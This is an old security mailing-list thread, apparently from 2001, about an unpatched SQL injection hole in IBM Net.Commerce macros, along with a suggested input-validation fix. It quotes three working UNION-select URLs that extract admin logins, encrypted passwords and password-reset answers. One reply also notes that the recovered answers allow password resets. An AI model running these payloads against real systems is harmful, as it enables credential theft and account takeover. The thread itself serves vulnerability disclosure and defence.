Re: IBM NetCommerce Security

[rudi carell]

>Those look really funny, anyone know the what algorythm is used, i >suppose
>it's the standard db2 function, but haven't tried that yet.

.. because of the column type this is just a hexadecimal representation ..
you can easily convert it to char ...


> > 3) "Password-Reminders"
>Actually these are the answers of the authentification questions, >asked
>for
>confirming the user's identity (which hints that the passwords may be
> >decryptable)

... once you got the right answer you are able to change or at least reset
the password .. and .. thats the trick :)


>I just confirmed that on Net.Commerce 3.1.2 and it's a really nasty >bug.
>One may query virtually any data from the db from almost any
>macro (default & custom). I don't believe it's an error in
>net.data.

... it is def. a "classic" "no-input-validation" :-) hole ...



rc




_
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Re: IBM NetCommerce Security

[Gedanken]

On Tue, 6 Feb 2001, Emil Popov wrote:

 Any thoughts, fixes, ideas??

The best way is to add 0 to the order_rn before using it.  if the
operation passes, the input was an int.  If it failed, then it wasnt and
something funky was attempted.  This is obviously only going to prevent
munging of integer fields but thats the vast majprity.

Its been a while since I coded n.c sites so I do not recall the exact
Add() function, but memory seems to tell me that there was even a
SecurityCheck function in the engine (and undocumented i believe) that did
this exact functionality for you.  If i had an install in front of me, i
would search the default macros for 'SecurityCheck' or some variant.

--
gedanken

Re: IBM NetCommerce Security

[Emil Popov]

> exploit:
>
>
> a few examples:
>
> 1) "HowTo find Administrator Accounts"
>
+http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9+union+select+s
+hlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A';
>
> 2) "Passwords(crypted)"
>
+http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9+union+select+s
+hlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';
>

Those look really funny, anyone know the what algorythm is used, i suppose
it's the standard db2 function, but haven't tried that yet.

> 3) "Password-Reminders"
>
+http://shophost.com/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=9+union+select+s
+hchaans+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin';

Actually these are the answers of the authentification questions, asked for
confirming the user's identity (which hints that the passwords may be decryptable)

>
> of course "orderdspc.d2w" is not the only vulnerable macro .. it s just an
> example. casting between different data-types is possible (read the db2-man
> pages).
>
> also it should(not proofed) be possible to query other databases.


I just confirmed that on Net.Commerce 3.1.2 and it's a really nasty bug.
One may query virtually any data from the db from almost any
macro (default & custom). I don't believe it's an error in
net.data. The whole concept is buggy and since most of the info returned by queries
is thrown in the HTML in on form or another, and the macros usually trust the
parameters passed to them and (like the order_rn) put them directly into the
'where' clause of the selects, thus allowing the attacker's 'union' to be
sent to the db as a normal sql request from the macro :(
It's quite difficult to think of a quick-fix for such a major
issue, but it seems that IBM is not releasing a patch for a
product they consider obsolete and superceeded by Web Sphere, or
atleast i couldn't find one.

Any thoughts, fixes, ideas??

~~~
Regards
Emil Popov
[EMAIL PROTECTED]